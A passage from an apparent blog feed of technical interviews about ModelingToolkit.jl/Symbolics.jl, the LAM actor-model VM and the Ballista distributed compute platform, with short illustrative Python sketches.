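    # the same trick (in spirit) as RuntimeGeneratedFunctions.jl.
    src = f"def f({', '.join(args)}):\n    return {to_source(node)}\n"
    namespace = {"math": math}
    exec(src, namespace)
    return namespace["f"]

f = compile_expr(expr, ["x", "y"])
print(f(3.0, 4.0))  # 3 * sqrt(4) = 6.0
```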
&lt;h4 id=&quot;what-are-the-mechanisms-that-allow-easy-model-composition-with-modelingtoolkit-jl&quot;&gt;What are the mechanisms that allow easy model composition with ModelingToolkit.jl?&lt;&#x2F;h4&gt;
&lt;p&gt;It’s the acausal modeling. You can develop pieces in isolation and just declare relationships between the components. For example, build a model of a power generator, and a model of a computer chip. Now you want to connect these two completely different models? Physically, a wire would connect them and then Kirchhoff’s laws would have to hold, i.e. the voltages would have to be equal at the connection points and the currents would sum to zero. So in ModelingToolkit.jl that’s what you’d do: you’d say “current from generator + current to chip = 0” and “voltage at generator = voltage at chip” and bingo, you’re there. Now this might produce some redundant variables and equations, but that’s okay: the symbolic preprocessing system eliminates all of this and simplifies down to the most efficient problem to simulate. Then at the end, you can ask “give me the timeseries of the voltage at the chip” and it will give it to you, regardless of whether it was actually in the simulation or not, because it has the information to reconstruct these values.&lt;&#x2F;p&gt;
&lt;p&gt;ModelingToolkit.jl goes one step further. There are &lt;code&gt;connect&lt;&#x2F;code&gt; statements which let you define a common behavior. For example, a &lt;code&gt;Pin&lt;&#x2F;code&gt; in an electrical circuit always has a voltage and a current, and those laws from above are how “connections” physically work. So at this higher level you can say “connect the pin of the generator to the pin of the circuit”, and it generates all of the physical relationships associated with that statement. There are many prebuilt systems which are coming very soon (likely to be completed before these responses are public!), so heat flow, enthalpy relationships, etc. are all simple &lt;code&gt;connect&lt;&#x2F;code&gt; statements. The connection mechanism is extendable too, so if connections have a different common meaning in, say, pharmacological models, you can create a new variable type and make connections automatically enforce the laws you want. Connecting the heart to the kidney could mean blood flow is conserved but oxygen is not. This makes it easy to specialize the systems to each of the specific scientific domains.&lt;&#x2F;p&gt;
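&lt;p&gt;As a toy sketch of what a &lt;code&gt;connect&lt;&#x2F;code&gt; statement expands into (illustrative Python, not ModelingToolkit.jl’s API; the &lt;code&gt;Pin&lt;&#x2F;code&gt; fields and function names are assumptions for this example): connecting pins generates the Kirchhoff-style constraints described above, equal potentials and flows summing to zero.&lt;&#x2F;p&gt;

```python
# Hypothetical toy version of acausal pin connection. Each component
# exposes a "pin" with a potential variable (voltage) and a flow variable
# (current); connecting pins generates the physical constraint equations.

class Pin:
    def __init__(self, name):
        self.voltage = f"{name}.v"   # potential: equal across a connection
        self.current = f"{name}.i"   # flow: sums to zero across a connection

def connect(*pins):
    """Generate the Kirchhoff-style equations for joining pins."""
    eqs = []
    first = pins[0]
    # All potentials are equal at the junction.
    for p in pins[1:]:
        eqs.append(f"{first.voltage} = {p.voltage}")
    # All flow variables sum to zero.
    eqs.append(" + ".join(p.current for p in pins) + " = 0")
    return eqs

generator, chip = Pin("generator"), Pin("chip")
for eq in connect(generator, chip):
    print(eq)
# generator.v = chip.v
# generator.i + chip.i = 0
```

A domain-specific connection type would simply generate a different equation set here, which is exactly the extension point described above.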
&lt;h4 id=&quot;what-are-the-advantages-of-symbolic-preprocessing-of-models&quot;&gt;What are the advantages of symbolic preprocessing of models?&lt;&#x2F;h4&gt;
&lt;p&gt;From the previous statement, note that simple modeling requires the ability to build things in isolation, and then just say “a=b”. Numerically simulating with “a=b” is rather difficult though, because numerical methods can only satisfy equations approximately. But if the current at one side is 10^(-8) higher than the other, you lose conservation of current, and you can have the power of the system steadily rising until it spirals out of control and the simulation crashes. This is actually a very common behavior in causal modeling systems. But if you eliminate the variable “b” and replace it with “a” in every place where it shows up, and then if the user asks for “b” you give them “a”, now you’ve symbolically enforced equality and you will never have a numerical issue due to that effect. So not only does it make the set of equations you have to solve smaller (making the solving process faster), but it also makes the numerical solving a lot more stable and more likely to succeed.&lt;&#x2F;p&gt;
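&lt;p&gt;The alias-elimination idea can be sketched in a few lines (a toy Python illustration, not ModelingToolkit.jl’s actual algorithm; the naive string substitution is only for demonstration): drop the equation “b = a”, rewrite every remaining equation, and remember the alias so “b” can still be reported after solving.&lt;&#x2F;p&gt;

```python
# Toy alias elimination: given "b = a", delete b from the system,
# substitute a wherever b appeared, and record the alias so the user
# can still ask for "b" after the simulation.

def eliminate_alias(equations, alias, target):
    """Drop `alias = target` and rewrite every remaining equation."""
    reduced, observed = [], {alias: target}
    for lhs, rhs in equations:
        if (lhs, rhs) == (alias, target):
            continue  # the alias equation itself is removed
        # Crude textual substitution, fine for this single-letter demo.
        reduced.append((lhs, rhs.replace(alias, target)))
    return reduced, observed

system = [
    ("b", "a"),            # the connection equation b = a
    ("da/dt", "-k*a + b"), # b shows up in the dynamics
]
reduced, observed = eliminate_alias(system, "b", "a")
print(reduced)    # [('da/dt', '-k*a + a')] -- one fewer equation, b gone
print(observed)   # {'b': 'a'} -- used to reconstruct b after solving
```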
&lt;h4 id=&quot;who-are-modelingtoolkit-jl-and-symbolics-jl-aimed-to-beyond-academia-do-you-consider-people-in-the-industry-might-find-them-useful&quot;&gt;Who are ModelingToolkit.jl and Symbolics.jl aimed at? Beyond academia, do you think people in industry might find them useful?&lt;&#x2F;h4&gt;
&lt;p&gt;Symbolics.jl is more academically focused. People doing symbolic computer algebra are everywhere, but I tend to see more in academia. Physicists, computational biologists, etc. Because Symbolics.jl allows for translating back and forth between Julia code and symbolic code automatically, we’re seeing computer scientists even adopt it as a nice and easy way to analyze code.&lt;&#x2F;p&gt;
&lt;p&gt;ModelingToolkit.jl on the other hand is more focused towards engineers and modelers. Mechanical engineers, robotics experts, building designers, synthetic biologists. These people are found commonly in both academia and industry. We’re getting a lot of praise from industry users of ModelingToolkit.jl already, so it’s likely to find a nice foothold there.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-many-people-are-involved-in-the-projects-what-are-their-backgrounds&quot;&gt;How many people are involved in the projects? What are their backgrounds?&lt;&#x2F;h4&gt;
&lt;p&gt;There are far too many involved, so I’m just going to give a shoutout to the top few. Yingbo Ma is a super star, still an undergrad but a major contributor to both SciML (the differential equation solvers and ModelingToolkit.jl) and JuliaSymbolics. Shashi Gowda is a PhD student at MIT who has been driving a lot of the internals of JuliaSymbolics. Then there have been many contributions by NASA folks, high schoolers, professors in math departments and biology departments, pandemic researchers, etc. It’s still very early on in the project but the community around it is already great.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-the-next-steps-for-each-project&quot;&gt;What are the next steps for each project?&lt;&#x2F;h4&gt;
&lt;p&gt;We’re going to have a major announcement very soon, so stay tuned.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>LAM: an actor-model VM for WebAssembly and native</title>
          <pubDate>Fri, 26 Feb 2021 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lam-an-actor-model-vm-for-webassembly-and-native/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lam-an-actor-model-vm-for-webassembly-and-native/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lam-an-actor-model-vm-for-webassembly-and-native/">&lt;p&gt;An interview with its creator, Leandro Ostera.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-ZA5-hKa-yYGz8FX-kmZh9g.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;abstractmachines.dev&#x2F;&quot;&gt;https:&#x2F;&#x2F;abstractmachines.dev&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Here, at NAMT, we are in love with the Actor Model.&lt;br &#x2F;&gt;
Within this paradigm, the basic units of computation are called actors. There is no shared state between them; instead, they interact via message passing. This has the advantage that actors become trivial to parallelize (in Erlang, an actor is called a &lt;em&gt;process&lt;&#x2F;em&gt;) and errors become easier to handle.&lt;&#x2F;p&gt;
&lt;p&gt;The actor model is a concurrency paradigm created by Carl Hewitt in 1973 with the goal of making the task of writing concurrent programs simpler. It is based on the idea of actors, entities that can only send, receive and process messages. By reducing the amount of shared state, it reduces the need for locks for synchronization. There exist several battle-tested implementations of the Actor Model such as Erlang&#x2F;OTP, Akka (Scala&#x2F;Java) and Orleans (C#).&lt;&#x2F;p&gt;
&lt;p&gt;In this interview, we chat with Leandro Ostera, the founder of Abstract Machines. Ostera is working on LAM, The Little Actor Machine, an embeddable virtual machine for the actor model that runs native or compiles to WebAssembly.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;The questions for this interview were thought up by Juan Pablo Amoroso, Javier Chatruc &amp;amp; Federico Carrone. Joaquín Centeno and Juan Bono wrote the introduction and edited the article.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;Tell us a bit about your project lab, Abstract Machines. What kind of work do you do?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I started Abstract Machines with a single goal in mind: build tools that would help me think more clearly.&lt;&#x2F;p&gt;
&lt;p&gt;Right now what I do think about the most is writing software. I think typed languages help me think clearly, so I’m building Caramel, an OCaml for the BEAM. I also think that understanding the program that runs your programs is fundamental to thinking clearly about the quality of what you build, so I’m building LAM, an actor-model VM.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;LAM’s tagline is “A Little Actor Machine that runs on Native and WebAssembly”. Could you give us a brief overview of the actor system?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The original name was Leandro’s Abstract Machine. Like Prolog’s WAM was named after Warren, Warren’s Abstract Machine, and the early Erlang VM was JAM after Joe’s Abstract Machine. But I think Little is a much better name overall: LAM should be small, tiny even.&lt;&#x2F;p&gt;
&lt;p&gt;The actor system it implements is in spirit very close to Erlang’s take on the actor model — processes with mailboxes, message passing across them, fair scheduling through reduction counting. There’s a few more things in the roadmap, like process linking and monitoring. Overall, if you have worked with Erlang or Elixir before, you should feel right at home with LAM.&lt;&#x2F;p&gt;
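&lt;p&gt;A minimal sketch of those two ingredients, mailboxes and reduction counting, in Python (illustrative only; LAM’s and the BEAM’s schedulers are far more involved, and the budget of 2 reductions is arbitrary): each process owns a private mailbox, and the scheduler runs a process for a fixed budget of work steps before requeueing it, which yields fairness without OS-level preemption.&lt;&#x2F;p&gt;

```python
from collections import deque

REDUCTION_BUDGET = 2  # arbitrary budget for the demo

class Process:
    def __init__(self, name, messages):
        self.name = name
        self.mailbox = deque(messages)  # private mailbox: no shared state
        self.log = []

    def step(self):
        # "Process" one message; in a real VM this would run bytecode.
        self.log.append(self.mailbox.popleft())

def run(processes):
    ready = deque(processes)
    while ready:
        proc = ready.popleft()
        for _ in range(REDUCTION_BUDGET):
            if not proc.mailbox:
                break
            proc.step()
        if proc.mailbox:
            # Budget spent but work remains: requeue, so no process
            # can starve the others. This is the fairness mechanism.
            ready.append(proc)

a = Process("a", ["m1", "m2", "m3"])
b = Process("b", ["n1"])
run([a, b])
print(a.log, b.log)  # ['m1', 'm2', 'm3'] ['n1']
```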
&lt;p&gt;&lt;strong&gt;What is the motivation behind LAM? Why build a BEAM alternative?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;LAM’s mission is to make Actor concurrency available everywhere by providing a specified, lightweight runtime. Think LuaVM meets the Actor Model. I’ve always liked the LuaVM, there’s a certain elegance to it that I find very appealing.&lt;&#x2F;p&gt;
&lt;p&gt;One of the reasons to build an alternative is that the BEAM is rather large, and the implementation is the only real spec. Erik Stenman’s Beam Book and kvakvs’ Beam Wisdoms have tried to document it, but without an official effort to produce a JVM-style spec (like the one you can get on a bookshelf), it’s unlikely we will have a reliable drop-in alternative any time soon.&lt;&#x2F;p&gt;
&lt;p&gt;So I thought I could instead make a new thing that could learn from both the LuaVM and the BEAM. At 35 instructions, LAM can run an interesting amount of Erlang programs; in fact, I’d like most code that runs on the BEAM to be bytecode-translatable to run on LAM. Not all of it, though, and we’ll see what doesn’t make the cut.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;One of LAM’s targets is WebAssembly. Is there any alternative actor system for the web? How do they compare with LAM?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Yes, there are plenty! A most promising one these days is Lunatic, but on the Erlang side of things, there’s the up-and-coming Lumen.&lt;&#x2F;p&gt;
&lt;p&gt;Most of the rest are libraries for building actor applications in other languages, like how Actix lets you use Actors in Rust. Lumen in particular is more of a compiler + runtime that brings Erlang down to LLVM and gives you this single optimized executable.&lt;&#x2F;p&gt;
&lt;p&gt;LAM by contrast is a higher level VM: you feed it bytecode (spawn, send, receive, call, make list, etc), and as it runs it, side-effects happen through FFI&#x2F;Bindings depending on the platform.&lt;&#x2F;p&gt;
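&lt;p&gt;A toy dispatch loop makes that concrete (the opcodes below are illustrative, not LAM’s actual instruction set): the VM crunches bytecode, and anything effectful is routed through a table of pluggable bindings, which is what lets the same bytecode run natively or under WebAssembly.&lt;&#x2F;p&gt;

```python
# Toy stack-based dispatch loop; opcodes and binding names are made up.
def run(bytecode, bindings):
    stack = []
    for op, *args in bytecode:
        if op == "push":
            stack.append(args[0])
        elif op == "make_list":
            # Pop n values and push them back as a single list.
            n = args[0]
            items = [stack.pop() for _ in range(n)][::-1]
            stack.append(items)
        elif op == "call":
            # Side effects go through pluggable bindings (the FFI layer),
            # so the host platform decides what a "call" actually does.
            fn = bindings[args[0]]
            stack.append(fn(stack.pop()))
        else:
            raise ValueError(f"unknown opcode: {op}")
    return stack

program = [("push", 1), ("push", 2), ("make_list", 2), ("call", "sum")]
result = run(program, {"sum": sum})  # → [3]
```

Swapping the `bindings` table is the whole porting story in this sketch: the bytecode never changes, only what the effectful calls are wired to.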
&lt;p&gt;Around LAM there’s a tiny compilation toolchain that takes that bytecode, lowers it to something that can be run a little faster, and packs it &lt;em&gt;with the VM&lt;&#x2F;em&gt; in a single binary that is optimized for a specific platform.&lt;&#x2F;p&gt;
&lt;p&gt;Because the VM is tiny, and the FFIs are pluggable, it’s straightforward to compile it to WebAssembly and run your bytecode there.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;The documentation mentions that one of the goals is to support Erlang&#x2F;OTP’s supervision tree structure. Would this allow more reliable&#x2F;resilient web UIs, capable of gracefully recovering from errors?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Absolutely! I expect it to let you build even more natural and flexible UIs. After all, the “event” model fits perfectly: when process Button receives message Click, do this&#x2F;that.&lt;&#x2F;p&gt;
&lt;p&gt;The main problem is that preemptive scheduling makes it impossible to guarantee certain processes will have enough time to make stuff like animations run smoothly. But I’m borrowing the idea of dirty schedulers and considering introducing Greedy Processes instead, that can either request upfront how much time they need, or just run to completion. Definitely interesting to experiment with hard-real time scheduling as well.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are some interesting use cases for LAM?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Off the top of my head, there are two. The first one is perhaps why I want it the most these days: fast CLI tools. Write ’em in Erlang&#x2F;Elixir&#x2F;Caramel, ship them as a single binary.&lt;&#x2F;p&gt;
&lt;p&gt;The second one will have the largest impact on how we build for the BEAM: actually writing full-stack applications in a single BEAM Language.&lt;&#x2F;p&gt;
&lt;p&gt;Write your backend in Elixir and run it on the BEAM, write your frontend in Elixir too but run it on LAM. And it doesn’t have to be a web-based app, it could be an actual native GUI application too.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why write it in Rust? Is the Rust-WASM toolchain mature enough to target WASM reliably with LAM?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I love Rust. It’s a good language and the learning curve has certainly taught me a lot about how to build software. I think the Rust-wasm toolchain is pretty mature these days too.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Besides performance (LAM compiles AOT), what will be the advantages of LAM over the BEAM?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Really the AOT stuff I can’t consider an advantage — I don’t expect LAM to be fundamentally faster than the BEAM, especially after the BeamJIT work. Nor do I expect it to compete in speed with Lumen.&lt;&#x2F;p&gt;
&lt;p&gt;What I see as an advantage is that LAM is being built to have a Specification and to be Embeddable.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;WebAssembly lacks a garbage collector and the BEAM is a GC environment. How does LAM tackle this?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;There is a wasm-gc spec in the works, and some other folks are waiting on it as well (like the OCaml-wasm efforts).&lt;&#x2F;p&gt;
&lt;p&gt;But since WebAssembly isn’t the only LAM target, we’ll have to embed a GC anyway. I expect it to work very much like the BEAM’s (per-process collection, ref-counted binary strings, etc). I haven’t looked so deeply into this, but I have a chunky book waiting for me (The Garbage Collection Handbook).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is this a solo project or are you looking for contributors? If you are looking for contributors, how should they get started (first issues, roadmap, etc)?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;So far it is just me, but I’d love to build a friendly and welcoming community around it. At the moment I’ve been focused on getting this vertical slice of the project up and running so it becomes easier to do some horizontal scoping: how far along are we with the specification, or how much of the BEAM bytecode can we support via translation.&lt;&#x2F;p&gt;
&lt;p&gt;There’s tons of work to do starting at the design level. From figuring out how to build the right layers to FFIs across platforms (native, wasi, web), to how to optimize the main emulator loop to crunch the bytecode as fast as possible, to GC and bundling the final binaries, to writing the spec and the manual.&lt;&#x2F;p&gt;
&lt;p&gt;Formalizing the spec is a big topic where I hope I can get some interest from the TLA+ community to guide me into doing justice to both TLA+ and LAM.&lt;&#x2F;p&gt;
&lt;p&gt;LAM could use help across the board, so if you’re reading this please tweet at me (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;leostera&#x2F;&quot;&gt;@leostera&lt;&#x2F;a&gt;)!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;For our last question, in general, what are your favorite books, articles or resources for programmers?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think that if you asked me this a year ago I would have regurgitated a bunch of books that I should list here, but that didn’t really further my understanding. There’s a lot of reference material that is just terrible for learning, because it’s meant to be a compendium of information rather than a pedagogically written introduction to a subject.&lt;&#x2F;p&gt;
&lt;p&gt;For example, Types and Programming Languages by Benjamin Pierce is deemed &lt;em&gt;the ultimate&lt;&#x2F;em&gt; reference for type stuff. But I learned more about the nature of typing by reading The Little Typer. After that it was a lot easier to get into the right headspace to understand what Pierce wanted me to get out of the book.&lt;&#x2F;p&gt;
&lt;p&gt;So if you’re getting into a subject, don’t rush for the ultimate reference, and find something written to teach you &lt;em&gt;the core&lt;&#x2F;em&gt; of the subject. Then the rest becomes a little easier.&lt;&#x2F;p&gt;
&lt;p&gt;Virtual Machines by Iain D. Craig, and Formal Development of a Network-Centric RTOS have been very useful in working with LAM. Hillel Wayne’s Practical TLA+ and the Alloy book, Software Abstractions, have been really good for getting a better grip on how to specify systems as well. Of course &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lamport.azurewebsites.net&#x2F;tla&#x2F;book.html&quot;&gt;“Specifying Systems” by Lamport&lt;&#x2F;a&gt; has been a good reference as well.&lt;&#x2F;p&gt;
&lt;p&gt;Some books that have had a massive impact on how I think and communicate have (unsurprisingly) nothing to do with computers. Like Umberto Eco’s “Six Walks in the Fictional Woods” (focused on how to create narratives and rhetoric) or Mandelbrot’s “The (Mis)Behavior of Markets” (a historical account of how fractal geometry better describes financial markets). Nonetheless, they’ve helped shape the way I think and I’ve come out a better programmer.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-nPPWbd4-7dJavk5P.gif&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Ballista, a distributed compute platform made with Rust and Apache Arrow</title>
          <pubDate>Thu, 28 Jan 2021 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/ballista-a-distributed-compute-platform-made-with-rust-and-apache-arrow/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/ballista-a-distributed-compute-platform-made-with-rust-and-apache-arrow/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/ballista-a-distributed-compute-platform-made-with-rust-and-apache-arrow/">&lt;h4 id=&quot;an-interview-with-its-creator-andy-grove&quot;&gt;An interview with its creator, Andy Grove&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-L6SAuZiiRQ4bBaCCiDaP_w.png&quot; alt=&quot;&quot; &#x2F;&gt;Ballista demo. Source: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;andygrove.io&#x2F;2020&#x2F;07&#x2F;ballista-one-year-on&#x2F;&quot;&gt;Andy Grove&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;“I have become frustrated over the years with the proliferation of Big Data tools built in JVM languages. I understand the reasons for this — Java, and especially Kotlin and Scala, are productive languages to work in, the ecosystem is very mature, and skills are widespread. However, it really isn’t the best language for these platforms. The most obvious alternative has been C++ for a long time, but I thought it would be really interesting to see what was possible with Rust.” — Andy Grove&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;As distributed computing platforms continue to become more relevant and new programming languages emerge with a modern approach and a focus on features that more traditional languages aren’t suited for, new and interesting technologies start appearing. In this interview, Andy Grove, software engineer and creator of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ballista-compute&#x2F;ballista&quot;&gt;Ballista&lt;&#x2F;a&gt;, a fresh distributed computing platform built primarily on Rust and powered by Apache Arrow technologies, provides some insight on the motivations behind the project as well as the technical details and features that make Ballista different.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-kYa4OnwY6NrvClA6wPpjZQ.png&quot; alt=&quot;&quot; &#x2F;&gt;Ballista is a work in progress. Once completed, its integrations will work like this. (Source: official documentation)&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;what-is-ballista-and-what-kind-of-problems-does-it-solve&quot;&gt;What is Ballista and what kind of problems does it solve?&lt;&#x2F;h4&gt;
&lt;p&gt;Ballista is a distributed compute platform with a current focus on executing ETL (extract, transform, and load) jobs based on queries which are defined using either a DataFrame API, SQL, or a combination of both.&lt;&#x2F;p&gt;
&lt;p&gt;Ballista is implemented in Rust and powered by Apache Arrow.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-the-main-advantages-of-using-apache-arrow-technologies&quot;&gt;What are the main advantages of using Apache Arrow technologies?&lt;&#x2F;h4&gt;
&lt;p&gt;In my opinion, there are quite a few advantages in using Apache Arrow for this project.&lt;&#x2F;p&gt;
&lt;p&gt;The Arrow memory format is optimized to support vectorized processing of columnar data and therefore enables significant performance improvements over row-based processing, especially when taking advantage of hardware that natively supports vectorized processing, such as SIMD and GPU.&lt;&#x2F;p&gt;
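&lt;p&gt;The row-versus-column difference is easy to see in miniature (plain Python for illustration; Arrow’s real format adds typed buffers, validity bitmaps, and much more): a columnar layout keeps each field contiguous, so an aggregate becomes a tight pass over flat arrays, exactly the shape that SIMD hardware and GPUs consume well.&lt;&#x2F;p&gt;

```python
# The same two records in a row-based and a columnar layout.
rows = [{"price": 10.0, "qty": 2}, {"price": 3.5, "qty": 4}]   # row-based
columns = {"price": [10.0, 3.5], "qty": [2, 4]}                # columnar

# Row-based aggregation: a field lookup per record, per field.
row_total = sum(r["price"] * r["qty"] for r in rows)

# Columnar aggregation: one pass over two contiguous arrays --
# the access pattern vectorizing compilers and SIMD units favor.
col_total = sum(p * q for p, q in zip(columns["price"], columns["qty"]))

print(row_total, col_total)  # both 34.0
```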
&lt;p&gt;Arrow also provides a “Flight” protocol, designed to enable Arrow data to be streamed efficiently (without &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.serde.rs&#x2F;serde&#x2F;&quot;&gt;serde&lt;&#x2F;a&gt; overhead) between processes, and Ballista’s executors implement this protocol.&lt;&#x2F;p&gt;
&lt;p&gt;In addition to these benefits, Arrow is a standard that is becoming adopted more widely over time, so designing Ballista from the ground-up to be Arrow-native helps ensure compatibility with other projects in the ecosystem.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-advantages-of-an-implementation-based-on-apache-arrow-over-native-data-structures&quot;&gt;What are advantages of an implementation based on Apache Arrow over native data structures?&lt;&#x2F;h4&gt;
&lt;p&gt;Arrow offers a mature type system and in-memory format for representing columnar data that has been tested and refined over many years, so I think this helps accelerate the development of the Ballista platform since there is no need to reinvent the wheel. It also ensures efficient compatibility with other projects that have also adopted Apache Arrow.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;can-you-tell-us-more-about-the-ballista-query-engine&quot;&gt;Can you tell us more about the Ballista query engine?&lt;&#x2F;h4&gt;
&lt;p&gt;Sure. Ballista is based on the Volcano design but has less overhead as a result of being designed to process batches of columnar data. Its design is very much inspired by Apache Spark but with a focus on being language-agnostic so that it can efficiently support popular programming languages such as Python, Java, and C++.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;ballista-has-a-very-similar-usage-to-apache-spark-what-are-the-main-advantages-of-ballista-over-it&quot;&gt;Ballista has a very similar usage to Apache Spark, what are the main advantages of Ballista over it?&lt;&#x2F;h4&gt;
&lt;p&gt;The main advantages of Ballista (at least, once it is more mature) are:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Columnar Design&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Although Apache Spark does have some support for columnar processing, it is still largely row-based. Because Ballista is natively columnar and is implemented in a systems level language, it can take advantage of vectorized processing with SIMD and GPU.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Language Agnostic&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Apache Spark is implemented in Scala and tends to have a Scala-first approach, with other languages paying a penalty to interact with Spark due to overheads of serde. Ballista has been architected to use language-agnostic protocols and serialization formats to avoid this.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Memory Efficiency&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Because Ballista is implemented in Rust, there are no GC pauses, and performance is very consistent and predictable. The combination of Rust and Arrow also results in much lower memory usage than Apache Spark — up to 5x lower memory usage in some cases. This means that more processing can fit on a single node, reducing the overhead of distributed compute.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-does-it-compare-to-dask&quot;&gt;How does it compare to Dask?&lt;&#x2F;h4&gt;
&lt;p&gt;I actually do not have any experience with Dask yet, although it has been on my “to do” list for a while now. I have heard a lot of positive things about Dask and I am sure that I could learn a lot from this project.&lt;&#x2F;p&gt;
&lt;p&gt;Dask is obviously Python-centric, so I suspect that is going to be the main differentiator. Although the Ballista scheduler is being implemented in Rust, it is designed to work with executors implemented in any language thanks to its use of Arrow’s Flight protocol and Google Protocol Buffers to represent query plans and scheduler tasks.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-the-reasons-behind-the-choice-of-rust-as-the-main-execution-language&quot;&gt;What are the reasons behind the choice of Rust as the main execution language?&lt;&#x2F;h4&gt;
&lt;p&gt;The reason that I started this project (first with DataFusion at the start of 2018, and now with Ballista) is that I have become frustrated over the years with the proliferation of Big Data tools built in JVM languages. I understand the reasons for this — Java, and especially Kotlin and Scala, are productive languages to work in, the ecosystem is very mature, and skills are widespread. However, it really isn’t the best language for these platforms. The most obvious alternative has been C++ for a long time, but I thought it would be really interesting to see what was possible with Rust.&lt;&#x2F;p&gt;
&lt;p&gt;I see Rust as being a good compromise between Java and C++. It has the memory-safety of Java (but implemented in a very different way) and the performance and predictability of C++.&lt;&#x2F;p&gt;
&lt;p&gt;The cost of compute can be very high with Big Data platforms, so it makes sense to use a language that can make efficient use of the available memory and processing power on each node. In some cases, Ballista uses a fraction of the memory of an equivalent Apache Spark job, and this means that each node in a cluster can process a multiple of the amount of data that Spark can support, resulting in smaller clusters that are utilized more effectively.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;apache-spark-has-mllib-a-library-for-handling-machine-learning-projects-what-features-does-ballista-offer-for-these-tasks&quot;&gt;Apache Spark has MLlib, a library for handling Machine Learning projects. What features does Ballista offer for these tasks?&lt;&#x2F;h4&gt;
&lt;p&gt;So far, the focus of Ballista has very much been on ETL workloads. There have been some discussions about supporting ML workloads, but this is an area that I do not have experience with, so I am hoping that once Ballista is a little more mature in terms of ETL processing, we can start to look at other areas like ML and listen to what the current pain points are.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-will-be-the-main-areas-of-focus-for-future-releases&quot;&gt;What will be the main areas of focus for future releases?&lt;&#x2F;h4&gt;
&lt;p&gt;The main focus now is getting the platform to a level of maturity where users can run real-world ETL workloads, using the TPC-H benchmarks to measure progress.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;beyond-performance-what-are-the-next-goals-for-the-ballista-project&quot;&gt;Beyond performance, what are the next goals for the Ballista project?&lt;&#x2F;h4&gt;
